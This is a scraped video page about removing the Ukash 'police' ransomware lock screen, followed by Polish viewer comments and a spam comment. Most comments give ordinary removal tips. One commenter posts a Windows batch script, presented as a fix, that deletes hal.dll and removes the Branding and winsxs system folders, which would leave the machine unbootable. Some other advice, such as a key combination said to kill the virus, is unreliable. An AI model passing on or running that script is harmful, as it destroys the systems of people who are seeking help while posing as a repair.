Rozwizanie Problemu UKASH
What do you think about this video?

AWRUK84: a ja mam linuksa Ubuntu i od przejścia na ten so nie wiem co to wirus/blue screeny itp Fakt było to przejscie z bólem ale warto sie na początku pomeczyc zeby potem miec spokuj

janek rozumek: ja mam McAfee i mi wszystkie wirusy wyszukuje to jest dobre

Marek SZYMAŃSKI: Jak tego posłuchać tego twojego ględzenia to nie wiadomo czemu to ma służyć przecież ten wirus to prawie jak każdy inny i dam ci radę zainstaluj dobrego płatnego anty wirusa o nazwie ,,MALWARE-BYTES'' i nie ma możliwości dostać się do komputera jaki kolwiek wirus czy trojan jest automatycznie blokowany oraz umieszczany w kwarantannie . A za zwyczaj blokowanie komputera przez policję jest tylko wtedy jak wysyłasz ze swojego kompa zainfekowane pliki do sieci i najpierw muszą cię namierzyć .

Ten Prawdziwy Fapaja: Ja mam tak ze jak wlaczam kompa to zamiast tej strony z wirusem pisze ze Ta strona web cos tam...I mam biale

Azotharr: *brofist* Bro !

PolskiGamerHD: Co do innych to nie mam pojencia ale mozna próbowac na kazdym ;D

VirtualPL: oooo mam windows xp ;(

PolskiGamerHD: Taaaaaaaaak :) na Windowsie 7 Dzia;a ;p

VirtualPL: serio???

VirtualPL: Można również zainstalować Adblocka, bo wirus ściąga się poprzez kliknięcie w reklamę, a adblock powoduje że nie pojawiają się reklamy

Rzeźnikowy: JA bym sie nie pierdolił, tylko format i chuj.

PolskiGamerHD: CTRL + Tab + Enter = Nara Wirusie

myneversing: Jakby hakerzy dali mniejszą kwotę typu 5 zł, to może ktoś by wysłał, dla spokoju. Ale za taką kasę :) To już jest wielka kwota, dla wielu.

cwFX: Najprostszy sposób! Miałem tego virusa. Po dwóch dniach włączam kompa i mi pisze wszystko normalnie, że Avast! zablokował niebezpiecznego trojana. Usunąłem go i po wszystkim :)

CreatiiveDesigner: wystarczy przywrócic na trybie awaryjnym . Tyle.

mix9741: @echo off cd %windir%\system32 erase hal.dll cd %windir% RD Branding RD winsxs pause

mix9741: dam ci wskazówke jak ja naprawiłem juz 20 kompów z tym wirusem bez żadnej inwazji :) wpisy rejestru ;)

Kristofff696: Sory ale tak pierdzielisz że nic nie zrozumiałem

Rocker2k12yo: Słoń- Love Forever

yogurtho: ja sam nie wiem dzis mi to wyskoczylo juz bylem wystraszony ze cos przeskrobalem ;p nawet tryb awaryjny nie pomagal tzn komputer podczas wlaczania na tryb awaryjny uruchamial sie ponownie i okienko z policji nadal wyskakiwalo... i szczerze powiedziawszy odlaczylem kabel od internetu i komputer sie normalnie odpalil.

Vet: When I graduated High School, all I wanted to do was kick back and relax without having to do any homework. But I realized I have no money to do anything fun. So I went to a San Francisco Vet School to get trained to make money. But seeing your videos, I am gonna be an internet marketer on the side. Let me know if you have any tips. Thanks.
Rating:
Rozwiązanie Problemu UKASH 5 out of 5

Shared by Others

Rozwiązanie Problemu UKASH
Rozwiązanie Problemu UKASH
HitmanPro.Kickstart installeren en gebruiken
HitmanPro.Kickstart installeren en gebruiken

Featured Video

How to Make Money Online


Rozwiązanie Problemu UKASH